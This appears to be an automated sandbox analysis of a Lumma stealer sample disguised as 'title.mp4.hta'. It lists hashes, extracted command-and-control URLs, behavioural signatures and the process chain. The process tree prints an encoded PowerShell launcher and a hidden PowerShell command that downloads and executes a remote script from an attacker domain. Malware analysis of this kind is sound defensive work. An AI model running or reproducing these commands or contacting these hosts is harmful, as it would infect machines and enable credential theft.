Analysis
-
max time kernel
95s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-01-2025 12:54
Static task
static1
Behavioral task
behavioral1
Sample
title.mp4.hta
Resource
win7-20241023-en
General
-
Target
title.mp4.hta
-
Size
2.6MB
-
MD5
5ffa4145e79128ab1c56abfb5a8455d7
-
SHA1
e8cec6950853414976683615b1467b1d4dae8ee6
-
SHA256
3cf8f04202e09ddfff4c1febc10873a38258116fadd806ce1110f36445bbeaf0
-
SHA512
b0c4356886e40cc9dce4eb2c0918ed4ef88dc9ef7441963d89ff3c0790d2e49b3319ea3a26094a496350163eb98f39888822bbf67530e38a5bd32a427e7884c1
-
SSDEEP
49152:SSQwzfrpqz053/ySQwzfrpqzoSQwzfrpqzoSQwzfrpqzd:SgIVgIsgI0gIR
Malware Config
Extracted
https://cabf.klipdesak.shop/smugle.bd
Extracted
lumma
https://wholersorie.shop/api
https://framekgirus.shop/api
https://tirepublicerj.shop/api
https://noisycuttej.shop/api
https://rabidcowse.shop/api
Signatures
-
Lumma family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 5028 created 3464 5028 powershell.exe 54 -
Blocklisted process makes network request 8 IoCs
flow pid Process 24 5028 powershell.exe 45 3964 powershell.exe 49 3964 powershell.exe 52 3964 powershell.exe 54 3964 powershell.exe 58 3964 powershell.exe 60 3964 powershell.exe 64 3964 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 5028 powershell.exe -
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/5028-45-0x00000000075A0000-0x00000000076E4000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5028 set thread context of 3964 5028 powershell.exe 95 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1324 powershell.exe 1324 powershell.exe 5028 powershell.exe 5028 powershell.exe 5028 powershell.exe 5028 powershell.exe 5028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 5028 powershell.exe Token: SeDebugPrivilege 5028 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2384 wrote to memory of 1324 2384 mshta.exe 82 PID 2384 wrote to memory of 1324 2384 mshta.exe 82 PID 2384 wrote to memory of 1324 2384 mshta.exe 82 PID 1324 wrote to memory of 5028 1324 powershell.exe 91 PID 1324 wrote to memory of 5028 1324 powershell.exe 91 PID 1324 wrote to memory of 5028 1324 powershell.exe 91 PID 5028 wrote to memory of 3964 5028 powershell.exe 95 PID 5028 wrote to memory of 3964 5028 powershell.exe 95 PID 5028 wrote to memory of 3964 5028 powershell.exe 95 PID 5028 wrote to memory of 3964 5028 powershell.exe 95 PID 5028 wrote to memory of 3964 5028 powershell.exe 95 PID 5028 wrote to memory of 3964 5028 powershell.exe 95 PID 5028 wrote to memory of 3964 5028 powershell.exe 95 PID 5028 wrote to memory of 3964 5028 powershell.exe 95 PID 5028 wrote to memory of 3964 5028 powershell.exe 95 PID 5028 wrote to memory of 3964 5028 powershell.exe 95
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3464
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\title.mp4.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5028
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:3964
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
16KB
MD51d9fdf77a10af9e2c3a8c08c1ad2f8c6
SHA17a85ec3d3e2c3572d703d40c27a9ad9399c07469
SHA2564a781d0df4f01e9ec7c1b45a65359f7ff576392d14d1cb62b2a32bca1bfbf478
SHA5126a09ffbfaf0cbcb7962d29163171fe73f56073b942917c208e4327bb99b883f9a04951d19f0614e32345cc6d048ee393256a7a009350580659fd576b5f436534
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82